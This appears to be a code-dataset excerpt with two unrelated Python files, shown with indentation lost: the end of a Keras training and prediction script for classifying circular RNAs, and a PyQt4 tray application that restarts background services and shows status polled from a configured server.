rcm_data, rcm_scaler = preprocess_data(training_data["rcm"])
joblib.dump(rcm_scaler, os.path.join(model_dir, 'rcm_scaler.pkl'))
rcm_train = rcm_data[training_indice]
rcm_validation = rcm_data[validation_indice]
rcm_net = get_rnn_fea(rcm_train, sec_num_hidden=rcm_hid, num_hidden=rcm_hid * 3)
rcm_data = []
training_data["rcm"] = []
if cons:
cons_data, cons_scaler = preprocess_data(training_data["cons"])
joblib.dump(cons_scaler, os.path.join(model_dir, 'cons_scaler.pkl'))
cons_train = cons_data[training_indice]
cons_validation = cons_data[validation_indice]
cons_net = get_rnn_fea(cons_train, sec_num_hidden=cons_hid, num_hidden=cons_hid * 3)
cons_data = []
training_data["cons"] = []
y, encoder = preprocess_labels(training_label)
val_y, encoder = preprocess_labels(validation_label, encoder=encoder)
training_data.clear()
model = Sequential()
training_net = []
training = []
validation = []
total_hid = 0
if seq:
training_net.append(seq_net)
training.append(seq_train)
validation.append(seq_validation)
total_hid = total_hid + seq_hid
seq_train = []
seq_validation = []
if rcm:
training_net.append(rcm_net)
training.append(rcm_train)
validation.append(rcm_validation)
total_hid = total_hid + rcm_hid
rcm_train = []
rcm_validation = []
if cons:
training_net.append(cons_net)
training.append(cons_train)
validation.append(cons_validation)
total_hid = total_hid + cons_hid
cons_train = []
cons_validation = []
#model.add(concatenate(training_net))
model.add(Merge(training_net, mode='concat'))
model.add(Dropout(0.2))
model.add(Dense(2, input_shape=(total_hid,)))
model.add(Activation('softmax'))
# sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
# model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
sgd = optimizers.SGD(lr=0.02, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(loss='mean_squared_error', optimizer=sgd, metrics=['accuracy'])
print(model.summary())
# checkpointer = ModelCheckpoint(filepath='bestmodel_circDeep.hdf5', verbose=1, save_best_only=True)
earlystopper = EarlyStopping(monitor='val_loss', patience=5, verbose=1)
print('model training')
model.fit(training, y, batch_size=128, nb_epoch=15, verbose=1, validation_data=(validation, val_y),
callbacks=[earlystopper])
model.save(os.path.join(model_dir, 'bestmodel_circDeep.pkl'))
#joblib.dump(model, os.path.join(model_dir,'bestmodel_circDeep.pkl'))
return model
def test_circDeep(data_dir, model_dir, genome, bigwig, gtf, testing_bed, seq=True, rcm=True, cons=True,
outfile='prediction.txt',model1=None):
testing_fasta, testing_sequences, cons_file, rcm_file, seq_file = extract_features_testing(testing_bed, genome,
bigwig, gtf, data_dir,model_dir)
test_data = load_data(data_dir, seq, rcm, cons, True, cons_file, rcm_file, seq_file)
# true_y = test_data["Y"].copy()
testing = []
if seq:
seq_data, seq_scaler = preprocess_data(test_data["seq"])
testing.append(seq_data)
if rcm:
rcm_data, rcm_scaler = preprocess_data(test_data["rcm"])
testing.append(rcm_data)
if cons:
cons_data, cons_scaler = preprocess_data(test_data["cons"])
testing.append(cons_data)
if model1==None:
try:
# sometimes load model getting errors from many users, it is because of
# different versions of keras and tensorflow librarues so ze recommende
# to use last versions. To overcome this problem we save features of our training data and ze train
# our model for few seconds each time ze wanna make test for bed file
model1 = load_model(os.path.join(model_dir, 'bestmodel_circDeep.pkl'))
except:
model1 = train_circDeep(data_dir, model_dir, genome, bigwig, gtf, None, None, seq, rcm,
cons, False)
# model = joblib.load(os.path.join(model_dir, 'bestmodel_circDeep.pkl'))
# model = joblib.load( os.path.join(model_dir,'model.pkl'))
predictions = model1.predict_proba(testing)
# pdb.set_trace()
# auc = roc_auc_score(true_y, predictions[:, 1])
# print "Test AUC: ", auc
# fw.write(str(auc) + '\n')
# mylabel = "\t".join(map(str, true_y))
fw = open(outfile, 'w')
myprob = "\n".join(map(str, predictions[:, 1]))
# fw.write(mylabel + '\n')
fw.write(myprob)
fw.close()
def run_circDeep(parser):
data_dir = parser.data_dir
out_file = parser.out_file
train = parser.train
model_dir = parser.model_dir
predict = parser.predict
seq = parser.seq
rcm = parser.rcm
genome = parser.genome
bigwig = parser.bigwig
gtf = parser.gtf
positive_bed = args.positive_bed
negative_bed = args.negative_bed
cons = parser.cons
testing_bed = args.testing_bed
if not os.path.exists(model_dir):
os.makedirs(model_dir)
if predict:
train = False
if train:
print('model training')
model=train_circDeep(data_dir, model_dir, genome, bigwig, gtf, positive_bed, negative_bed, seq, rcm,
cons,True)
test_circDeep(data_dir, model_dir, genome, bigwig, gtf, testing_bed, seq, rcm, cons,out_file,model)
else:
print('model prediction')
model=None
test_circDeep(data_dir, model_dir, genome, bigwig, gtf, testing_bed, seq, rcm, cons,
out_file,model)
def parse_arguments(parser):
parser.add_argument('--data_dir', type=str, default='data/', metavar='<data_directory>',
help='Under this directory, you will have descriptors files ')
parser.add_argument('--train', type=bool, default=True, help='use this option for training model')
parser.add_argument('--model_dir', type=str, default='models/',
help='The directory to save the trained models for future prediction')
parser.add_argument('--predict', type=bool, default=False,
help='Predicting circular RNAs. if using train, then it will be False')
parser.add_argument('--out_file', type=str, default='prediction.txt',
help='The output file used to store the prediction probability of testing data')
parser.add_argument('--seq', type=bool, default=True, help='The modularity of ACNN-BLSTM seq')
parser.add_argument('--rcm', type=bool, default=True, help='The modularity of RCM')
parser.add_argument('--cons', type=bool, default=True, help='The modularity of conservation')
parser.add_argument('--genome', type=str, default='data/hg38.fasta', help='The Fasta file of genome')
parser.add_argument('--gtf', type=str, default='data/Homo_sapiens.Ensembl.GRCh38.82.gtf',
help='The gtf annotation file. e.g., hg38.gtf')
parser.add_argument('--bigwig', type=str, default='data/hg38.phyloP20way.bw',
help='conservation scores in bigWig file format')
parser.add_argument('--positive_bed', type=str, default='data/circRNA_dataset.bed',
help='BED input file for circular RNAs for training, it should be like:chromosome start end gene')
parser.add_argument('--negative_bed', type=str, default='data/negative_dataset.bed',
help='BED input file for other long non coding RNAs for training, it should be like:chromosome start end gene')
parser.add_argument('--testing_bed', type=str, default='data/test.bed',
help='BED input file for testing data, it should be like:chromosome start end gene')
args = parser.parse_args()
return args
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='circular RNA classification from other long non-coding RNA using multimodal deep learning')
args = parse_arguments(parser)
run_circDeep(args)
|
qt_start.pyw
|
import sys
import time
from socket import socket
from threading import Thread
from PyQt4.QtGui import *
import start_services
import settings
import os.path
from multiprocessing import Process
class Window(QMainWindow):
def __init__(self):
super(Window, self).__init__()
self.create_main_window()
self.create_actions()
self.create_tray_icon()
self.run_services()
self.run_update_status_thread()
def create_main_window(self):
self.icon = QIcon(os.path.join(settings.app_dir, 'docs', 'hope.ico'))
self.resize(320, 180)
self.setWindowTitle("Hope")
self.setWindowIcon(self.icon)
self.restart_btn = QPushButton('Restart Services', self)
self.restart_btn.resize(200, 80)
self.restart_btn.move(60, 50)
self.restart_btn.setFont(QFont("Consolas", 16))
self.restart_btn.clicked.connect(self.restart)
self.statusBar()
def restart(self):
self.restart_btn.setEnabled(False)
reload(start_services)
self.stop_services()
self.run_services()
self.restart_btn.setEnabled(True)
self.statusBar().showMessage("Services restarted")
self.run_update_status_thread()
def create_actions(self):
self.quit_action = QAction("&Quit", self, triggered=self.close)
def create_tray_icon(self):
self.tray_icon_menu = QMenu(self)
self.tray_icon_menu.addAction(self.quit_action)
self.tray_icon = QSystemTrayIcon(self)
self.tray_icon.setContextMenu(self.tray_icon_menu)
self.tray_icon.setIcon(self.icon)
self.tray_icon.activated.connect(self.tray_activated)
self.tray_icon.setToolTip("Hope")
self.tray_icon.show()
def tray_activated(self, reason):
if reason == 2:
if self.isVisible():
self.hide()
else:
self.showNormal()
def closeEvent(self, event):
self.hide()
event.ignore()
def run_services(self):
self.statusBar().showMessage("Running Services ...")
self.process = Process(target=start_services.run_services)
self.process.start()
def stop_services(self):
self.statusBar().showMessage("Stopping Services ...")
if self.process:
self.process.terminate()
self.process = None
def update_status(self):
time.sleep(60)
s = socket()
s.connect(settings.info_server_address)
while True:
s.sendall('info')
data = s.recv(4096)
self.statusBar().showMessage(data)
time.sleep(settings.ip_check_interval)
def run_update_status_thread(self):
t = Thread(target=self.update_status)
t.setDaemon(True)
t.start()
def close(self):
self.stop_services()
sys.exit()
if __name__ == '__main__':
app = QApplication(sys.argv)
w = Window()
# w.show()
sys.exit(app.exec_())
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.